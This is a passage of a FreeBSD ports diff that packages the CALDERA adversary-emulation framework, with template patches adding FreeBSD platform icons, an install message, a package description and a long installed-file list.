'fa-linux'; else if (platform.includes('freebsd')) return 'fa-freebsd'"></em></span> + </span> + </template> + </td> +@@ -262,7 +262,7 @@ + <b x-text="ability.name"></b> | + <span x-text="ability.tactic"></span> | + <template x-for="platform of getExecutorDetail('platforms', ability)"> +- <span class="icon is-small"><em class="fab" x-bind:class="if (platform.includes('windows')) return 'fa-windows'; else if (platform.includes('darwin')) return 'fa-apple'; else if (platform.includes('linux')) return 'fa-linux'"></em></span> ++ <span class="icon is-small"><em class="fab" x-bind:class="if (platform.includes('windows')) return 'fa-windows'; else if (platform.includes('darwin')) return 'fa-apple'; else if (platform.includes('linux')) return 'fa-linux'; else if (platform.includes('freebsd')) return 'fa-freebsd'"></em></span> + </template> | + <span class="icon is-small" x-show="getExecutorDetail('requirements', ability)"><em class="fas fa-lock"></em></span> + <span class="icon is-small" x-show="getExecutorDetail('cleanup', ability)"><em class="fas fa-trash"></em></span> diff --git a/security/caldera/files/patch-templates_agents.html b/security/caldera/files/patch-templates_agents.html new file mode 100644 index 000000000000..82828a0e9756 --- /dev/null +++ b/security/caldera/files/patch-templates_agents.html @@ -0,0 +1,32 @@ +--- templates/agents.html.orig 2022-09-17 15:28:09 UTC ++++ templates/agents.html +@@ -143,6 +143,11 @@ + <span class="icon is-large"><i class="fab fa-2x fa-apple"></i></span> + <br> darwin + </div> ++ <div class="has-text-centered platform" x-bind:class="{ 'selected': selectedPlatform === 'freebsd' }" x-show="platforms.includes('freebsd')" @click="changePlatform('freebsd')"> ++ <span class="icon is-large"><i class="fab fa-2x fa-freebsd"></i></span> ++ <br> freebsd ++ </div> ++ + </div> + </div> + </form> +@@ -174,7 +179,7 @@ + <div class="tags are-medium has-addons"> + <span class="tag is-black"> + <span class="icon"> +- <i class="fab" x-bind:class="{ 'fa-windows': command.platform === 'windows', 'fa-linux': command.platform === 'linux', 'fa-apple': command.platform === 'darwin' }"></i> ++ <i class="fab" x-bind:class="{ 'fa-windows': command.platform === 'windows', 'fa-linux': command.platform === 'linux', 'fa-apple': command.platform === 'darwin', 'fa-freebsd': command.platform === 'freebsd' }"></i> + </span> + </span> + <span class="tag is-dark" x-text="command.executor"></span> +@@ -193,7 +198,7 @@ + <div class="tags are-medium has-addons"> + <span class="tag is-black"> + <span class="icon"> +- <i class="fab" x-bind:class="{ 'fa-windows': command.platform === 'windows', 'fa-linux': command.platform === 'linux', 'fa-apple': command.platform === 'darwin' }"></i> ++ <i class="fab" x-bind:class="{ 'fa-windows': command.platform === 'windows', 'fa-linux': command.platform === 'linux', 'fa-apple': command.platform === 'darwin', 'fa-freebsd': command.platform === 'freebsd' }"></i> + </span> + </span> + <span class="tag is-dark" x-text="command.executor"></span> diff --git a/security/caldera/files/pkg-message.in b/security/caldera/files/pkg-message.in new file mode 100644 index 000000000000..f97eaf3e8be7 --- /dev/null +++ b/security/caldera/files/pkg-message.in @@ -0,0 +1,53 @@ +[ +{ type: install + message: <<EOM +Caldera port were installed + +1) Take on mind it is a modifying version of Caldera for include FreeBSD as + supported OS and you could found some issues. Problem reports are welcome. + +2) Add the following lines to /etc/rc.conf + + # sysrc caldera_enable="YES" + +3) Before of start Caldera you must run some scripts for generate/update payload + files + + # cd %%WWWDIR%%/plugins/manx && sh update-shells.sh + # cd %%WWWDIR%%/plugins/sandcat && sh update-agents.sh + +4) Do not forget modify configuration files before of run Caldera. For default + it runs in insecure mode (http). Caldera configuration files are located at + + %%WWWDIR%%/conf + +5) If you want run it in secure mode (https) take a look in ssl plugin section: + + https://caldera.readthedocs.io/en/latest/Plugin-library.html#ssl + +6) Start Caldera service + + # service caldera start + +7) When Caldera is starting, atomic plugin will use git to download files from + the following link: + + https://github.com/redcanaryco/atomic-red-team + + Those files are necessary for generate yml files used by Caldera abilities + +8) Caldera web listens on port 8888 by default and it uses red/admin or + blue/admin like user/password. + + http://your_caldera_server_ip:8888 + +9) Log file is located at /var/log/caldera.log + +10) For more configure information you can look at the following link: + + https://caldera.readthedocs.io/en/latest/ + +11) Enjoy it +EOM +} +] diff --git a/security/caldera/pkg-descr b/security/caldera/pkg-descr new file mode 100644 index 000000000000..462121a2708e --- /dev/null +++ b/security/caldera/pkg-descr @@ -0,0 +1,14 @@ +CALDERA a cyber security platform designed to easily automate adversary +emulation, assist manual red-teams, and automate incident response. + +It is built on the MITRE ATT&CK framework and is an active research project +at MITRE. + +The framework consists of two components: + +- The core system. This is the framework code, consisting of what is available + in this repository. Included is an asynchronous command-and-control (C2) + server with a REST API and a web interface. +- Plugins. These repositories expand the core framework capabilities and + providing additional functionality. Examples include agents, reporting, + collections of TTPs and more. diff --git a/security/caldera/pkg-plist b/security/caldera/pkg-plist new file mode 100644 index 000000000000..ab4dc204a75c --- /dev/null +++ b/security/caldera/pkg-plist @@ -0,0 +1,1283 @@ +@mode 640 +@owner www +@group www +%%WWWDIR%%/CONTRIBUTING.md +%%WWWDIR%%/LICENSE +%%WWWDIR%%/README.md +%%WWWDIR%%/SECURITY.md +%%WWWDIR%%/app/__init__.py +%%WWWDIR%%/app/api/packs/advanced.py +%%WWWDIR%%/app/api/packs/campaign.py +%%WWWDIR%%/app/api/rest_api.py +%%WWWDIR%%/app/api/v2/__init__.py +%%WWWDIR%%/app/api/v2/errors.py +%%WWWDIR%%/app/api/v2/handlers/ability_api.py +%%WWWDIR%%/app/api/v2/handlers/adversary_api.py +%%WWWDIR%%/app/api/v2/handlers/agent_api.py +%%WWWDIR%%/app/api/v2/handlers/base_api.py +%%WWWDIR%%/app/api/v2/handlers/base_object_api.py +%%WWWDIR%%/app/api/v2/handlers/config_api.py +%%WWWDIR%%/app/api/v2/handlers/contact_api.py +%%WWWDIR%%/app/api/v2/handlers/fact_api.py +%%WWWDIR%%/app/api/v2/handlers/fact_source_api.py +%%WWWDIR%%/app/api/v2/handlers/health_api.py +%%WWWDIR%%/app/api/v2/handlers/obfuscator_api.py +%%WWWDIR%%/app/api/v2/handlers/objective_api.py +%%WWWDIR%%/app/api/v2/handlers/operation_api.py +%%WWWDIR%%/app/api/v2/handlers/planner_api.py +%%WWWDIR%%/app/api/v2/handlers/plugins_api.py +%%WWWDIR%%/app/api/v2/handlers/schedule_api.py +%%WWWDIR%%/app/api/v2/managers/ability_api_manager.py +%%WWWDIR%%/app/api/v2/managers/adversary_api_manager.py +%%WWWDIR%%/app/api/v2/managers/agent_api_manager.py +%%WWWDIR%%/app/api/v2/managers/base_api_manager.py +%%WWWDIR%%/app/api/v2/managers/config_api_manager.py +%%WWWDIR%%/app/api/v2/managers/contact_api_manager.py +%%WWWDIR%%/app/api/v2/managers/fact_api_manager.py +%%WWWDIR%%/app/api/v2/managers/operation_api_manager.py +%%WWWDIR%%/app/api/v2/managers/schedule_api_manager.py +%%WWWDIR%%/app/api/v2/responses.py +%%WWWDIR%%/app/api/v2/schemas/base_schemas.py +%%WWWDIR%%/app/api/v2/schemas/caldera_info_schemas.py +%%WWWDIR%%/app/api/v2/schemas/config_schemas.py +%%WWWDIR%%/app/api/v2/schemas/deploy_command_schemas.py +%%WWWDIR%%/app/api/v2/schemas/error_schemas.py +%%WWWDIR%%/app/api/v2/security.py +%%WWWDIR%%/app/api/v2/validation.py +%%WWWDIR%%/app/contacts/contact_dns.py +%%WWWDIR%%/app/contacts/contact_ftp.py +%%WWWDIR%%/app/contacts/contact_gist.py +%%WWWDIR%%/app/contacts/contact_html.py +%%WWWDIR%%/app/contacts/contact_http.py +%%WWWDIR%%/app/contacts/contact_slack.py +%%WWWDIR%%/app/contacts/contact_tcp.py +%%WWWDIR%%/app/contacts/contact_udp.py +%%WWWDIR%%/app/contacts/contact_websocket.py +%%WWWDIR%%/app/contacts/handles/h_beacon.py +%%WWWDIR%%/app/contacts/tunnels/tunnel_ssh.py +%%WWWDIR%%/app/data_encoders/base64_basic.py +%%WWWDIR%%/app/data_encoders/plain_text.py +%%WWWDIR%%/app/learning/p_ip.py +%%WWWDIR%%/app/learning/p_path.py +%%WWWDIR%%/app/objects/c_ability.py +%%WWWDIR%%/app/objects/c_adversary.py +%%WWWDIR%%/app/objects/c_agent.py +%%WWWDIR%%/app/objects/c_data_encoder.py +%%WWWDIR%%/app/objects/c_obfuscator.py +%%WWWDIR%%/app/objects/c_objective.py +%%WWWDIR%%/app/objects/c_operation.py +%%WWWDIR%%/app/objects/c_planner.py +%%WWWDIR%%/app/objects/c_plugin.py +%%WWWDIR%%/app/objects/c_schedule.py +%%WWWDIR%%/app/objects/c_source.py +%%WWWDIR%%/app/objects/interfaces/i_object.py +%%WWWDIR%%/app/objects/secondclass/c_executor.py +%%WWWDIR%%/app/objects/secondclass/c_fact.py +%%WWWDIR%%/app/objects/secondclass/c_goal.py +%%WWWDIR%%/app/objects/secondclass/c_instruction.py +%%WWWDIR%%/app/objects/secondclass/c_link.py +%%WWWDIR%%/app/objects/secondclass/c_parser.py +%%WWWDIR%%/app/objects/secondclass/c_parserconfig.py +%%WWWDIR%%/app/objects/secondclass/c_relationship.py +%%WWWDIR%%/app/objects/secondclass/c_requirement.py +%%WWWDIR%%/app/objects/secondclass/c_result.py +%%WWWDIR%%/app/objects/secondclass/c_rule.py +%%WWWDIR%%/app/objects/secondclass/c_variation.py +%%WWWDIR%%/app/objects/secondclass/c_visibility.py +%%WWWDIR%%/app/service/app_svc.py +%%WWWDIR%%/app/service/auth_svc.py +%%WWWDIR%%/app/service/contact_svc.py +%%WWWDIR%%/app/service/data_svc.py +%%WWWDIR%%/app/service/event_svc.py +%%WWWDIR%%/app/service/file_svc.py +%%WWWDIR%%/app/service/interfaces/i_app_svc.py +%%WWWDIR%%/app/service/interfaces/i_auth_svc.py +%%WWWDIR%%/app/service/interfaces/i_contact_svc.py +%%WWWDIR%%/app/service/interfaces/i_data_svc.py +%%WWWDIR%%/app/service/interfaces/i_event_svc.py +%%WWWDIR%%/app/service/interfaces/i_file_svc.py +%%WWWDIR%%/app/service/interfaces/i_knowledge_svc.py +%%WWWDIR%%/app/service/interfaces/i_learning_svc.py +%%WWWDIR%%/app/service/interfaces/i_login_handler.py +%%WWWDIR%%/app/service/interfaces/i_object_svc.py +%%WWWDIR%%/app/service/interfaces/i_planning_svc.py +%%WWWDIR%%/app/service/interfaces/i_rest_svc.py +%%WWWDIR%%/app/service/knowledge_svc.py +%%WWWDIR%%/app/service/learning_svc.py +%%WWWDIR%%/app/service/login_handlers/default.py +%%WWWDIR%%/app/service/planning_svc.py +%%WWWDIR%%/app/service/rest_svc.py +%%WWWDIR%%/app/utility/base_knowledge_svc.py +%%WWWDIR%%/app/utility/base_obfuscator.py +%%WWWDIR%%/app/utility/base_object.py +%%WWWDIR%%/app/utility/base_parser.py +%%WWWDIR%%/app/utility/base_planning_svc.py +%%WWWDIR%%/app/utility/base_service.py +%%WWWDIR%%/app/utility/base_world.py +%%WWWDIR%%/app/utility/config_generator.py +%%WWWDIR%%/app/utility/file_decryptor.py +%%WWWDIR%%/app/utility/payload_encoder.py +%%WWWDIR%%/app/utility/rule_set.py +%%WWWDIR%%/app/version.py +%%WWWDIR%%/conf/agents.yml +%%WWWDIR%%/conf/default.yml +%%WWWDIR%%/conf/payloads.yml +%%WWWDIR%%/conf/ssh_keys/.gitignore +%%WWWDIR%%/data/abilities/.gitkeep +%%WWWDIR%%/data/adversaries/.gitkeep +%%WWWDIR%%/data/backup/.gitkeep +%%WWWDIR%%/data/objectives/.gitkeep +%%WWWDIR%%/data/payloads/.gitkeep +%%WWWDIR%%/data/results/.gitkeep +%%WWWDIR%%/data/sources/.gitkeep +%%WWWDIR%%/docker-compose.yml +%%WWWDIR%%/package-lock.json +%%WWWDIR%%/package.json +%%WWWDIR%%/plugins/access/.github/ISSUE_TEMPLATE/bug_report.md +%%WWWDIR%%/plugins/access/.github/ISSUE_TEMPLATE/config.yml +%%WWWDIR%%/plugins/access/.github/ISSUE_TEMPLATE/feature_request.md +%%WWWDIR%%/plugins/access/.github/ISSUE_TEMPLATE/question.md +%%WWWDIR%%/plugins/access/.github/pull_request_template.md +%%WWWDIR%%/plugins/access/.gitignore +%%WWWDIR%%/plugins/access/README.md +%%WWWDIR%%/plugins/access/VERSION.txt +%%WWWDIR%%/plugins/access/app/access_api.py +%%WWWDIR%%/plugins/access/data/abilities/build-capabilities/bed8f28e-c0ed-463e-9e31-d5607e5473df.yml +%%WWWDIR%%/plugins/access/data/abilities/technical-information-gathering/567eaaba-94cc-4a27-83f8-768e5638f4e1.yml +%%WWWDIR%%/plugins/access/data/payload/90ef8eaa-01b7-4e98-9070-105eca3bac39.yml +%%WWWDIR%%/plugins/access/data/payloads/msf_extract.rc +%%WWWDIR%%/plugins/access/data/payloads/scanner.sh +%%WWWDIR%%/plugins/access/hook.py +%%WWWDIR%%/plugins/access/static/.gitkeep +%%WWWDIR%%/plugins/access/templates/access.html +%%WWWDIR%%/plugins/atomic/.flake8 +%%WWWDIR%%/plugins/atomic/.github/ISSUE_TEMPLATE/bug_report.md +%%WWWDIR%%/plugins/atomic/.github/ISSUE_TEMPLATE/config.yml +%%WWWDIR%%/plugins/atomic/.github/ISSUE_TEMPLATE/feature_request.md +%%WWWDIR%%/plugins/atomic/.github/ISSUE_TEMPLATE/question.md +%%WWWDIR%%/plugins/atomic/.github/pull_request_template.md +%%WWWDIR%%/plugins/atomic/.github/workflows/testing.yml +%%WWWDIR%%/plugins/atomic/.gitignore +%%WWWDIR%%/plugins/atomic/.pre-commit-config.yaml +%%WWWDIR%%/plugins/atomic/LICENSE +%%WWWDIR%%/plugins/atomic/README.md +%%WWWDIR%%/plugins/atomic/VERSION.txt +%%WWWDIR%%/plugins/atomic/app/atomic_gui.py +%%WWWDIR%%/plugins/atomic/app/atomic_svc.py +%%WWWDIR%%/plugins/atomic/app/parsers/atomic_powershell.py +%%WWWDIR%%/plugins/atomic/data/.gitkeep +%%WWWDIR%%/plugins/atomic/hook.py +%%WWWDIR%%/plugins/atomic/payloads/.gitkeep +%%WWWDIR%%/plugins/atomic/templates/atomic.html +%%WWWDIR%%/plugins/atomic/tests/.gitkeep +%%WWWDIR%%/plugins/atomic/tests/test_atomic_svc.py +%%WWWDIR%%/plugins/atomic/tox.ini +%%WWWDIR%%/plugins/builder/.github/ISSUE_TEMPLATE/bug_report.md +%%WWWDIR%%/plugins/builder/.github/ISSUE_TEMPLATE/config.yml +%%WWWDIR%%/plugins/builder/.github/ISSUE_TEMPLATE/feature_request.md +%%WWWDIR%%/plugins/builder/.github/ISSUE_TEMPLATE/question.md +%%WWWDIR%%/plugins/builder/.github/pull_request_template.md +%%WWWDIR%%/plugins/builder/.gitignore +%%WWWDIR%%/plugins/builder/README.md +%%WWWDIR%%/plugins/builder/VERSION.txt +%%WWWDIR%%/plugins/builder/app/build_svc.py +%%WWWDIR%%/plugins/builder/app/builder_gui.py +%%WWWDIR%%/plugins/builder/build/.gitkeep +%%WWWDIR%%/plugins/builder/conf/environments.yml +%%WWWDIR%%/plugins/builder/hook.py +%%WWWDIR%%/plugins/builder/install.sh +%%WWWDIR%%/plugins/builder/payloads/.gitkeep +%%WWWDIR%%/plugins/builder/requirements.txt +%%WWWDIR%%/plugins/builder/templates/builder.html +%%WWWDIR%%/plugins/compass/.github/ISSUE_TEMPLATE/bug_report.md +%%WWWDIR%%/plugins/compass/.github/ISSUE_TEMPLATE/config.yml +%%WWWDIR%%/plugins/compass/.github/ISSUE_TEMPLATE/feature_request.md +%%WWWDIR%%/plugins/compass/.github/ISSUE_TEMPLATE/question.md +%%WWWDIR%%/plugins/compass/.github/pull_request_template.md +%%WWWDIR%%/plugins/compass/.gitignore +%%WWWDIR%%/plugins/compass/README.md +%%WWWDIR%%/plugins/compass/VERSION.txt +%%WWWDIR%%/plugins/compass/app/compass_svc.py +%%WWWDIR%%/plugins/compass/hook.py +%%WWWDIR%%/plugins/compass/templates/compass.html +%%WWWDIR%%/plugins/debrief/.flake8 +%%WWWDIR%%/plugins/debrief/.github/ISSUE_TEMPLATE/bug_report.md +%%WWWDIR%%/plugins/debrief/.github/ISSUE_TEMPLATE/config.yml +%%WWWDIR%%/plugins/debrief/.github/ISSUE_TEMPLATE/feature_request.md +%%WWWDIR%%/plugins/debrief/.github/ISSUE_TEMPLATE/question.md +%%WWWDIR%%/plugins/debrief/.github/pull_request_template.md +%%WWWDIR%%/plugins/debrief/.gitignore +%%WWWDIR%%/plugins/debrief/README.md +%%WWWDIR%%/plugins/debrief/VERSION.txt +%%WWWDIR%%/plugins/debrief/app/debrief-sections/agents.py +%%WWWDIR%%/plugins/debrief/app/debrief-sections/attackpath_graph.py +%%WWWDIR%%/plugins/debrief/app/debrief-sections/fact_graph.py +%%WWWDIR%%/plugins/debrief/app/debrief-sections/facts_table.py +%%WWWDIR%%/plugins/debrief/app/debrief-sections/main_summary.py +%%WWWDIR%%/plugins/debrief/app/debrief-sections/statistics.py +%%WWWDIR%%/plugins/debrief/app/debrief-sections/steps_graph.py +%%WWWDIR%%/plugins/debrief/app/debrief-sections/steps_table.py +%%WWWDIR%%/plugins/debrief/app/debrief-sections/tactic_graph.py +%%WWWDIR%%/plugins/debrief/app/debrief-sections/tactic_technique_table.py +%%WWWDIR%%/plugins/debrief/app/debrief-sections/technique_graph.py +%%WWWDIR%%/plugins/debrief/app/debrief_gui.py +%%WWWDIR%%/plugins/debrief/app/debrief_svc.py +%%WWWDIR%%/plugins/debrief/app/objects/c_story.py +%%WWWDIR%%/plugins/debrief/app/utility/base_report_section.py +%%WWWDIR%%/plugins/debrief/conf/default.yml +%%WWWDIR%%/plugins/debrief/docs/debrief1.png +%%WWWDIR%%/plugins/debrief/docs/debrief2.png +%%WWWDIR%%/plugins/debrief/docs/debrief3.png +%%WWWDIR%%/plugins/debrief/docs/debrief_2020-09-14_16-03-43.pdf +%%WWWDIR%%/plugins/debrief/downloads/.gitkeep +%%WWWDIR%%/plugins/debrief/hook.py +%%WWWDIR%%/plugins/debrief/requirements.txt +%%WWWDIR%%/plugins/debrief/static/css/debrief.css +%%WWWDIR%%/plugins/debrief/static/img/access.svg +%%WWWDIR%%/plugins/debrief/static/img/caldera.png +%%WWWDIR%%/plugins/debrief/static/img/cloud.svg +%%WWWDIR%%/plugins/debrief/static/img/collection.svg +%%WWWDIR%%/plugins/debrief/static/img/commandcontrol.svg +%%WWWDIR%%/plugins/debrief/static/img/credaccess.svg +%%WWWDIR%%/plugins/debrief/static/img/darwin.svg +%%WWWDIR%%/plugins/debrief/static/img/debrief.jpg +%%WWWDIR%%/plugins/debrief/static/img/defevasion.svg +%%WWWDIR%%/plugins/debrief/static/img/discovery.svg +%%WWWDIR%%/plugins/debrief/static/img/execution.svg +%%WWWDIR%%/plugins/debrief/static/img/exfil.svg +%%WWWDIR%%/plugins/debrief/static/img/impact.svg +%%WWWDIR%%/plugins/debrief/static/img/latmove.svg +%%WWWDIR%%/plugins/debrief/static/img/link.svg +%%WWWDIR%%/plugins/debrief/static/img/linux.svg +%%WWWDIR%%/plugins/debrief/static/img/operation.svg +%%WWWDIR%%/plugins/debrief/static/img/persistence.svg +%%WWWDIR%%/plugins/debrief/static/img/privesc.svg +%%WWWDIR%%/plugins/debrief/static/img/star.svg +%%WWWDIR%%/plugins/debrief/static/img/tactic.svg +%%WWWDIR%%/plugins/debrief/static/img/technique.svg +%%WWWDIR%%/plugins/debrief/static/img/unknown.svg +%%WWWDIR%%/plugins/debrief/static/img/windows.svg +%%WWWDIR%%/plugins/debrief/static/js/d3-zoom.v1.min.js +%%WWWDIR%%/plugins/debrief/static/js/d3.v4.min.js +%%WWWDIR%%/plugins/debrief/static/js/graph.js +%%WWWDIR%%/plugins/debrief/templates/debrief.html +%%WWWDIR%%/plugins/debrief/uploads/.gitkeep +%%WWWDIR%%/plugins/debrief/uploads/header-logos/.gitkeep +%%WWWDIR%%/plugins/emu/.flake8 +%%WWWDIR%%/plugins/emu/.github/ISSUE_TEMPLATE/bug_report.md +%%WWWDIR%%/plugins/emu/.github/ISSUE_TEMPLATE/config.yml +%%WWWDIR%%/plugins/emu/.github/ISSUE_TEMPLATE/feature_request.md +%%WWWDIR%%/plugins/emu/.github/ISSUE_TEMPLATE/question.md +%%WWWDIR%%/plugins/emu/.github/pull_request_template.md +%%WWWDIR%%/plugins/emu/.github/workflows/testing.yml +%%WWWDIR%%/plugins/emu/.gitignore +%%WWWDIR%%/plugins/emu/.pre-commit-config.yaml +%%WWWDIR%%/plugins/emu/LICENSE +%%WWWDIR%%/plugins/emu/README.md +%%WWWDIR%%/plugins/emu/app/emu_gui.py +%%WWWDIR%%/plugins/emu/app/emu_svc.py +%%WWWDIR%%/plugins/emu/app/group_filtered_planner.py +%%WWWDIR%%/plugins/emu/app/parsers/vssadmin_shadow.py +%%WWWDIR%%/plugins/emu/data/.gitkeep +%%WWWDIR%%/plugins/emu/download_payloads.sh +%%WWWDIR%%/plugins/emu/hook.py +%%WWWDIR%%/plugins/emu/payloads/.gitkeep +%%WWWDIR%%/plugins/emu/templates/emu.html +%%WWWDIR%%/plugins/emu/tests/.gitkeep +%%WWWDIR%%/plugins/emu/tests/test_emu_svc.py +%%WWWDIR%%/plugins/emu/tests/test_group_filtered_planner.py +%%WWWDIR%%/plugins/emu/tests/test_vssadmin_shadow_parser.py +%%WWWDIR%%/plugins/emu/tox.ini +%%WWWDIR%%/plugins/fieldmanual/.github/ISSUE_TEMPLATE/bug_report.md +%%WWWDIR%%/plugins/fieldmanual/.github/ISSUE_TEMPLATE/config.yml +%%WWWDIR%%/plugins/fieldmanual/.github/ISSUE_TEMPLATE/feature_request.md +%%WWWDIR%%/plugins/fieldmanual/.github/ISSUE_TEMPLATE/question.md +%%WWWDIR%%/plugins/fieldmanual/.github/pull_request_template.md +%%WWWDIR%%/plugins/fieldmanual/.gitignore +%%WWWDIR%%/plugins/fieldmanual/README.md +%%WWWDIR%%/plugins/fieldmanual/VERSION.txt +%%WWWDIR%%/plugins/fieldmanual/hook.py +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/Basic-Usage.md +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/C2-Tunneling.md +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/Dynamically-Compiled-Payloads.md +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/Exfiltration.md +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/Getting-started.md +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/How-to-Build-Agents.md +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/How-to-Build-Planners.md +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/How-to-Build-Plugins.md +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/Initial-Access-Attacks.md +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/Installing-CALDERA.md +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/Lateral-Movement-Guide.md +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/Learning-the-terminology.md +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/Makefile +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/Objectives.md +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/Operation-Results.md +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/Parsers.md +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/Plugin-library.md +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/Relationships.md +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/Requirements.md +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/Sandcat-Peer-to-Peer.md +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/Server-Configuration.md +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/The-REST-API.md +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/Troubleshooting.md +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/Uninstalling-CALDERA.md +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/_static/lm_guide.mp4 +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/conf.py +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/img/debrief_attack_path.png +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/img/fact_relationships.png +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/img/privileged_persistence_state_machine.png +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/index.rst.j2 +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/make.bat +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/plugins/.gitkeep +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/resources.rst +%%WWWDIR%%/plugins/fieldmanual/static/opener.html +%%WWWDIR%%/plugins/fieldmanual/utils/ability_csv.py +%%WWWDIR%%/plugins/fieldmanual/utils/plugin_docs.py +%%WWWDIR%%/plugins/gameboard/.github/ISSUE_TEMPLATE/bug_report.md +%%WWWDIR%%/plugins/gameboard/.github/ISSUE_TEMPLATE/config.yml +%%WWWDIR%%/plugins/gameboard/.github/ISSUE_TEMPLATE/feature_request.md +%%WWWDIR%%/plugins/gameboard/.github/ISSUE_TEMPLATE/question.md +%%WWWDIR%%/plugins/gameboard/.github/pull_request_template.md +%%WWWDIR%%/plugins/gameboard/.github/workflows/stale.yml +%%WWWDIR%%/plugins/gameboard/.gitignore +%%WWWDIR%%/plugins/gameboard/README.md +%%WWWDIR%%/plugins/gameboard/VERSION.txt +%%WWWDIR%%/plugins/gameboard/app/gameboard_api.py +%%WWWDIR%%/plugins/gameboard/app/gameboard_svc.py +%%WWWDIR%%/plugins/gameboard/conf/gameboard.yml +%%WWWDIR%%/plugins/gameboard/data/abilities/verification/0df4d46e-e202-4b29-9a19-c2540982002d.yml +%%WWWDIR%%/plugins/gameboard/data/abilities/verification/4a9b51ba-1a0d-4128-a040-5535fd147dc3.yml +%%WWWDIR%%/plugins/gameboard/data/adversaries/7d1794bb-d7ce-4fe8-bae0-6959fa0a0a48.yml +%%WWWDIR%%/plugins/gameboard/hook.py +%%WWWDIR%%/plugins/gameboard/templates/gameboard.html +%%WWWDIR%%/plugins/human/.github/ISSUE_TEMPLATE/bug_report.md +%%WWWDIR%%/plugins/human/.github/ISSUE_TEMPLATE/config.yml +%%WWWDIR%%/plugins/human/.github/ISSUE_TEMPLATE/feature_request.md +%%WWWDIR%%/plugins/human/.github/ISSUE_TEMPLATE/question.md +%%WWWDIR%%/plugins/human/.github/pull_request_template.md +%%WWWDIR%%/plugins/human/.gitignore +%%WWWDIR%%/plugins/human/README.md +%%WWWDIR%%/plugins/human/VERSION.txt +%%WWWDIR%%/plugins/human/app/c_human.py +%%WWWDIR%%/plugins/human/app/c_workflow.py +%%WWWDIR%%/plugins/human/app/human_api.py +%%WWWDIR%%/plugins/human/app/human_svc.py +%%WWWDIR%%/plugins/human/hook.py +%%WWWDIR%%/plugins/human/payloads/.gitkeep +%%WWWDIR%%/plugins/human/pyhuman/__init__.py +%%WWWDIR%%/plugins/human/pyhuman/app/utility/base_driver.py +%%WWWDIR%%/plugins/human/pyhuman/app/utility/base_workflow.py +%%WWWDIR%%/plugins/human/pyhuman/app/utility/webdriver_helper.py +%%WWWDIR%%/plugins/human/pyhuman/app/workflows/browse_web.py +%%WWWDIR%%/plugins/human/pyhuman/app/workflows/browse_youtube.py +%%WWWDIR%%/plugins/human/pyhuman/app/workflows/download_files.py +%%WWWDIR%%/plugins/human/pyhuman/app/workflows/execute_command.py +%%WWWDIR%%/plugins/human/pyhuman/app/workflows/google_search.py +%%WWWDIR%%/plugins/human/pyhuman/app/workflows/ms_paint.py +%%WWWDIR%%/plugins/human/pyhuman/app/workflows/open_office_calc.py +%%WWWDIR%%/plugins/human/pyhuman/app/workflows/open_office_writer.py +%%WWWDIR%%/plugins/human/pyhuman/app/workflows/spawn_shell.py +%%WWWDIR%%/plugins/human/pyhuman/data/browse_youtube.txt +%%WWWDIR%%/plugins/human/pyhuman/data/google_searches.txt +%%WWWDIR%%/plugins/human/pyhuman/data/websites.txt +%%WWWDIR%%/plugins/human/pyhuman/human.py +%%WWWDIR%%/plugins/human/pyhuman/requirements.txt +%%WWWDIR%%/plugins/human/requirements.txt +%%WWWDIR%%/plugins/human/static/css/human.css +%%WWWDIR%%/plugins/human/templates/human.html +%%WWWDIR%%/plugins/manx/.github/ISSUE_TEMPLATE/bug_report.md +%%WWWDIR%%/plugins/manx/.github/ISSUE_TEMPLATE/config.yml +%%WWWDIR%%/plugins/manx/.github/ISSUE_TEMPLATE/feature_request.md +%%WWWDIR%%/plugins/manx/.github/ISSUE_TEMPLATE/question.md +%%WWWDIR%%/plugins/manx/.github/pull_request_template.md +%%WWWDIR%%/plugins/manx/.gitignore +%%WWWDIR%%/plugins/manx/README.md +%%WWWDIR%%/plugins/manx/VERSION.txt +%%WWWDIR%%/plugins/manx/app/c_session.py +%%WWWDIR%%/plugins/manx/app/h_terminal.py +%%WWWDIR%%/plugins/manx/app/term_api.py +%%WWWDIR%%/plugins/manx/app/term_svc.py +%%WWWDIR%%/plugins/manx/data/abilities/command-and-control/356d1722-7784-40c4-822b-0cf864b0b36d.yml +%%WWWDIR%%/plugins/manx/data/adversaries/56aebecf-abca-40c1-ad24-658e7c25b55b.yml +%%WWWDIR%%/plugins/manx/hook.py +%%WWWDIR%%/plugins/manx/payloads/manx.go-darwin +%%WWWDIR%%/plugins/manx/payloads/manx.go-linux +%%WWWDIR%%/plugins/manx/payloads/manx.go-windows +%%WWWDIR%%/plugins/manx/shells/commands/commands.go +%%WWWDIR%%/plugins/manx/shells/commands/payloads.go +%%WWWDIR%%/plugins/manx/shells/go.mod +%%WWWDIR%%/plugins/manx/shells/manx.go +%%WWWDIR%%/plugins/manx/shells/output/output.go +%%WWWDIR%%/plugins/manx/shells/sockets/contact.go 